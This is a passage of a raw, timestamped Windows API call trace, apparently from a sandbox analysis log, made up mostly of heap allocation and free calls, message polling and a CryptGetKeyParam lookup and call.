lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0177.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0177.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0177.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0177.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0177.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0177.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.870] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0177.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0177.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.872] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0177.872] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.874] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.874] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0177.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0177.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0177.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.875] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.875] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.875] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.875] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.875] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.875] 